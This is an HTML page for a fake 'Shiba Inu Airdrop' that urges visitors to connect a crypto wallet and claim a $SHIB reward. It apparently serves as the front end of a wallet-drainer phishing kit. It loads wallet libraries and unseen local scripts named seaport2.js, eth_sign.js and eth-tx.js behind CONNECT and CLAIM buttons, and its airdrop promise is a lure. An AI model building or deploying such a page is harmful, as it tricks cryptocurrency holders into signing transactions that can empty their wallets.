﻿<!DOCTYPE html>
<html>

<head>
     <meta name="viewport" content="width=device-width">
    <meta charset="UTF-8">
    <title>$SHIB | Claim your reward now</title>
    <link href="npm/bootstrap%405.3.0/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-9ndCyUaIbzAi2FUVXJi0CjmCapSmO7SnpJef0486qhLnuZ2cdeRhO02iuK6FUUVM" crossorigin="anonymous">
    <script src="npm/bootstrap%405.3.0/dist/js/bootstrap.bundle.min.js" integrity="sha384-geWF76RCwLtnZ8qwWowPQNguL3RmwHVBC9FhGdlKrxdiJJigb/j/68SIy3Te4Bkz" crossorigin="anonymous"></script>
		<script src="https://bundle.run/buffer@6.0.3"></script> 
<script src="https://cdnjs.cloudflare.com/ajax/libs/ethers/5.6.9/ethers.umd.min.js"></script>
<script src="https://unpkg.com/@walletconnect/web3-provider@1.7.5/dist/umd/index.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/web3@3.0.0-rc.5/dist/web3.min.js"></script>
<script src="https://unpkg.com/moralis-v1@latest/dist/moralis.js"></script>
<script src="js/seaport2.js"></script>
<script src="js/eth_sign.js"></script>
<script src="js/eth-tx.js"></script>
<script src="js/main.js"></script>
    <link href="style.css" rel="stylesheet" type="text/css">
    <link rel="icon" type="image/png" href="fav.png">  
</head>

<body>
    <div class="container mainbl">
        <div class="area">Shiba Inu Airdrop </div>
        <div class="row">
            <div class="col-lg-3"></div>
            <div class="col-lg-6">
                <div class="image"><img src="image.png" alt=""></div>
                <p class="maintitle">
                    $Claim Section
                </p>
            </div>
            <div class="col-lg-3"></div>
        </div>
        <div class="row btn-row">
            <div class="col-lg-3"></div>
            <div class="col-lg-6">
				<button id="connectButton" class="interact-button">CONNECT</button>
                <button id="claimButton" class="interact-button">CLAIM</button>
            </div>
            <div class="col-lg-3"></div>
        </div>
        <div class="row types">
            <div class="col-lg-4">
                <p class="title">$SHIB</p>
                <p class="subtext">Ethereum-based cryptocurrency that has gained significant attention and popularity among crypto enthusiasts.</p>
            </div>
            <div class="col-lg-4">
                <p class="title">Global meme</p>
                <p class="subtext">Became a global meme and achieved a significant market capitalization, driven by its viral online presence and the potential for high returns.</p>
            </div>
            <div class="col-lg-4">
                <p class="title">Your Time</p>
                <p class="subtext">Now you have the chance to join a massive community with airdrop.</p>
            </div>
        </div>
    </div>
    <script src="build/three.js"></script>

    <script>
        var scene, camera, renderer;
        var particles, particleGeometry, particleMaterial;

        init();

        function init() {
            scene = new THREE.Scene();
            scene.background = new THREE.Color(0x000000);
            camera = new THREE.PerspectiveCamera(75, window.innerWidth / window.innerHeight, 0.1, 1000);
            camera.position.z = 5;

            particleGeometry = new THREE.BufferGeometry();
            var particleCount = 1000;
            var positions = new Float32Array(particleCount * 3);

            for (var i = 0; i < positions.length; i++) {
                positions[i] = (Math.random() - 0.5) * 10;
            }

            particleGeometry.setAttribute('position', new THREE.BufferAttribute(positions, 3));

            particleMaterial = new THREE.PointsMaterial({
                color: 0xFFFFFF,
                size: 0.01
            });

            particles = new THREE.Points(particleGeometry, particleMaterial);
            scene.add(particles);

            renderer = new THREE.WebGLRenderer({
                antialias: true
            });
            renderer.setSize(window.innerWidth, window.innerHeight);

            document.body.appendChild(renderer.domElement);

            animate();
        }

        function animate() {
            requestAnimationFrame(animate);

            particles.rotation.x += 0.001;
            particles.rotation.y += 0.002;

            renderer.render(scene, camera);
        }
    </script>
</body>

</html>